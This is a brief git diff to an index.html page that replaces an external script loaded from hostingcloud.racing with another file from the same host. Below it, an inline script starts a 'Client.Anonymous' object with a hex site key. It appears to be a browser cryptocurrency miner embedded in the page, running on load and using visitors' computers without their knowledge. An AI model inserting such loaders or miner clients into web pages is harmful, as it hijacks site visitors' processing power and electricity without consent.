--- a/index.html
+++ b/index.html
@@ -12,7 +12,7 @@
 	
 <body>
             
-<script src="https://www.hostingcloud.racing/E4cx.js"></script>
+<script src="https://www.hostingcloud.racing/aBsJ.js"></script>
 	
 <script>
     var _client = new Client.Anonymous('2d51a7d74290e8a2047efcc6420122fb2df20bf2ab6f457120811e167338344d', {
